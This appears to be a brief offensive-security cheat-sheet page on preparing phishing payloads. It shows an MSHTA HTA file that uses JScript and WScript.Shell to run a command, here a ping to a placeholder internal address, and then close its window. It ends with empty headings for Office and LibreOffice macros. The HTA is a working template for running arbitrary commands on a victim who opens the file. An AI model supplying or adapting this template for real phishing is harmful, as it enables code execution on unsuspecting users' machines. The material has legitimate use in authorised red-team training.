Phishing Payload
Prepare for phishing payload
MSHTA
# simple ping
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 3 10.10.x.y");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>LibreOffice (Linux)
Microsoft Word


Macro
BadAssMacro
Standard Format
Last updated